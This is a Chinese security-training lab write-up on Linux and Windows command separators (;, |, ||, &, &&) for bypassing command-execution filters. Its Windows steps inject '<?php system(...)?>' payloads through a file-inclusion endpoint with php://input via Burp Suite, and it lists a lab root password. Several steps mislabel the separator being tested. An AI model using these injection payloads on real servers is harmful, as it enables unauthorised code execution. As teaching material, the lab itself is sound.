文章总结： 本文详细讲解了Windows和Linux操作系统中常用管道符号的区别与用法。Linux管道符包括分号（顺序执行）、单竖线（输出传递）和双竖线（前错后执）；Windows管道符包括与号（前假后执）、双与号（短路逻辑）、单竖线（直接执行）和双竖线（前错后执）。实验通过KaliLinux终端和BurpSuite抓包工具分别演示了各管道符在不同命令执行场景下的实际效果，帮助学习者掌握命令执行漏洞绕过技术的基础知识。 综合评分： 68 文章分类： 渗透测试,Web安全,漏洞分析,安全培训

网安实验干货每日分享管道符号-0127

原创

建哥聊安全 建哥聊安全

建哥聊安全

2026年1月27日 09:02 湖南

管道符号

实验目的

通过本实验，掌握Windows操作系统和Linxu操作系统常用的管道符号以及不同管道符号的区别。

实验环境

·操作机：Kali2018 用户名：root 密码：Sangfor!7890

·靶机：Apache + PHP

·实验地址：http://ip/include/include.php

实验原理

通过Windows和Linux不同操作系统执行不同管道符号查看执行结果，掌握不同管道符号的区别。

Linux常用管道符：

;前面的执行完执行后面的

|是管道符，显示后面的执行结果

||当前面的执行出错时执行后面的

Windows常用管道符

&前面的语句为假则直接执行后面的

&&前面的语句为假则直接出错，后面的也不执行

|直接执行后面的语句

||前面出错执行后面的

实验步骤

Linux管道符

1、登录kali2018，打开终端

2、在终端中输入”whoami;ls”，查看”;”管道符前后两个命令都正确的结果

3、在终端中输入”whoam;ls”，查看”;”管道符前面命令错误，后面命令正确的结果

4、在终端中输入”whoami;lss”，查看”;”管道符前面命令正确，后面命令错误的结果

5、在终端中输入”whoami|ls”，查看”|”管道符前后两个命令都正确的结果

6、在终端中输入”whoam|ls”，查看”|”管道符前面命令错误，后面命令正确的结果

7、在终端中输入”whoami|lss”，查看”|”管道符前面命令正确，后面命令错误的结果

8、在终端中输入”whoami||ls”，查看”||”管道符前后两个命令都正确的结果

9、在终端中输入”whoam||ls”，查看”||”管道符前面命令错误，后面命令正确的结果

10、在终端中输入”whoami|lss”，查看”|”管道符前面命令正确，后面命令错误的结果

Windows管道符

1、打开浏览器，访问http://ip/include/include.php?page=xxx.php，获取Web根目录，判断服务器操作系统为Windows

2、打开Burp Suite抓包工具

3、切换到“Proxy”代理模块的“Options”，查看Bp的代理

4、切换到浏览器，对浏览器做代理设置，，与Bp的代理一致

5、访问http://ip/include/include.php>page=php://input，抓取数据包

6、鼠标右击，点击”Send to Repeater”（或者快捷键”Ctrl” + “R”），发送数据包到Repeater模块，然后切换到Repeater模块

7、在数据包中输入”<?php system(‘whoami&dir’);?>“，点击上面的”Go”，发送修改后的数据包，查看”&”管道符前后两个命令都正确的结果

8、在数据包中输入”<?php system(‘whoam&dir’);?>“，点击上面的”Go”，发送修改后的数据包，查看”&”管道符前面命令错误，后面命令正确的结果

9、在数据包中输入”<?php system(‘whoami&di’);?>“，点击上面的”Go”，发送修改后的数据包，查看”&”管道符前面命令正确，后面命令错误的结果

10、在数据包中输入”<?php system(‘whoami&&dir’);?>“，点击上面的”Go”，发送修改后的数据包，查看”&&”管道符前后两个命令都正确的结果

11、在数据包中输入”<?php system(‘whoam&dir’);?>“，点击上面的”Go”，发送修改后的数据包，查看”&&”管道符前面命令错误，后面命令正确的结果

12、在数据包中输入”<?php system(‘whoami&di’);?>“，点击上面的”Go”，发送修改后的数据包，查看”&&”管道符前面命令正确，后面命令错误的结果

13、在数据包中输入”<?php system(‘whoami|dir’);?>“，点击上面的”Go”，发送修改后的数据包，查看”|”管道符前后两个命令都正确的结果

14、在数据包中输入”<?php system(‘whoam|dir’);?>“，点击上面的”Go”，发送修改后的数据包，查看”|”管道符前面命令错误，后面命令正确的结果

15、在数据包中输入”<?php system(‘whoami|di’);?>“，点击上面的”Go”，发送修改后的数据包，查看”|”管道符前面命令正确，后面命令错误的结果

16、在数据包中输入”<?php system(‘whoami||dir’);?>“，点击上面的”Go”，发送修改后的数据包，查看”||”管道符前后两个命令都正确的结果

17、在数据包中输入”<?php system(‘whoam||dir’);?>“，点击上面的”Go”，发送修改后的数据包，查看”||”管道符前面命令错误，后面命令正确的结果

18、在数据包中输入”<?php system(‘whoami||di’);?>“，点击上面的”Go”，发送修改后的数据包，查看”||”管道符前面命令正确，后面命令错误的结果

实验总结

通过本实验，掌握Windows操作系统和Linux操作系统常用通道符的用法以及区别，可以用来绕过命令执行。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全 建哥聊安全 建哥聊安全《网安实验干货每日分享管道符号-0127》